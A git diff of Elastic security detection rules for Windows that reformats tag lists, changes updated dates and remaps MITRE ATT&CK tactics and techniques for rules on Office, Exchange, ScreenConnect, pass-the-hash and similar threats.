Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -107,13 +122,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml index fbd7ead64d2..28e435a3737 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/08" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] @@ -66,7 +66,19 @@ references = [ risk_score = 73 rule_id = "f81ee52c-297e-46d9-9205-07e66931df26" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -82,12 +94,22 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -98,38 +120,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml index f44626289f7..74d8fad8028 100644 --- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -77,7 +77,22 @@ references = ["https://www.elastic.co/blog/vulnerability-summary-follina"] risk_score = 47 rule_id = "a624863f-a70d-417f-a7d2-7a404638d47f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -108,25 +123,27 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -137,27 +154,22 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml index c00264926f5..c0828b44e66 100644 --- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -75,7 +75,22 @@ This rule looks for suspicious processes spawned by MS Outlook, which can be the risk_score = 21 rule_id = "32f4675e-6c49-4ace-80f9-97c9259dca2e" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -95,36 +110,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml index d60b1c1c4fa..c1bfe3cbe84 100644 --- a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml +++ b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/24" [rule] author = ["Elastic"] @@ -58,7 +58,19 @@ references = [ risk_score = 73 rule_id = "1ac027c2-8c60-4715-af73-927b9c219e20" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -74,30 +86,22 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -108,7 +112,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml index 2f44d1c7787..17c356f8d2c 100644 --- a/rules/windows/initial_access_url_cve_2025_33053.toml +++ b/rules/windows/initial_access_url_cve_2025_33053.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/11" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/11" [rule] author = ["Elastic"] @@ -52,7 +52,19 @@ references = [ risk_score = 73 rule_id = "5e23495f-09e2-4484-8235-bdb150d698c9" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -72,31 +84,37 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [[rule.threat.technique.subtechnique]] -id = "T1574.008" -name = "Path Interception by Search Order Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/008/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + + + [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index f5e2aeffe12..7a7e8c67522 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/29" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -60,7 +60,20 @@ Windows Explorer, a core component of the Windows OS, manages file and folder na risk_score = 47 rule_id = "9a5b4e31-6cde-4295-9ff7-6be1b8567e1b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -83,36 +96,63 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml index 1b5936dcd82..fbe76f594f5 100644 --- a/rules/windows/initial_access_webshell_screenconnect_server.toml +++ b/rules/windows/initial_access_webshell_screenconnect_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] @@ -92,12 +92,22 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -108,20 +118,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml index 9b08ea6268f..2a1b8903abd 100644 --- a/rules/windows/initial_access_xsl_script_execution_via_com.toml +++ b/rules/windows/initial_access_xsl_script_execution_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -18,7 +18,15 @@ name = "Remote XSL Script Execution via COM" risk_score = 21 rule_id = "48f657ee-de4f-477c-aa99-ed88ee7af97a" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -74,31 +82,31 @@ The Microsoft.XMLDOM COM interface allows applications to parse and transform XM [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" - -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_alternate_creds_pth.toml b/rules/windows/lateral_movement_alternate_creds_pth.toml index 7ea89b9a9da..1e5bd39b62b 100644 --- a/rules/windows/lateral_movement_alternate_creds_pth.toml +++ b/rules/windows/lateral_movement_alternate_creds_pth.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -55,7 +55,14 @@ references = ["https://attack.mitre.org/techniques/T1550/002/"] risk_score = 47 rule_id = "daafdf96-e7b1-4f14-b494-27e0d24b11f6" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -69,39 +76,22 @@ user.id : (S-1-5-21-* or S-1-12-1-*) and winlog.event_data.LogonProcessName : "s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.002" -name = "Pass the Hash" -reference = "https://attack.mitre.org/techniques/T1550/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.new_terms] field = "new_terms_fields" value = ["user.id"] diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 580a36e40c5..3e17c1558a3 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,7 +57,15 @@ The Service Control Manager in Windows allows for the management of services, wh risk_score = 21 rule_id = "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -72,49 +80,48 @@ sequence by process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml index 698eebfb106..ecce43b56cd 100644 --- a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml +++ b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/28" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/12" [rule] author = ["Elastic"] @@ -64,7 +64,20 @@ references = [ risk_score = 73 rule_id = "c6b40f4c-c6a9-434e-adb8-989b0d06d005" severity = "high" -tags = ["Domain: Endpoint", "Domain: Identity", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Identity", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Lateral Movement", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,11 +99,33 @@ sequence by source.port, source.ip 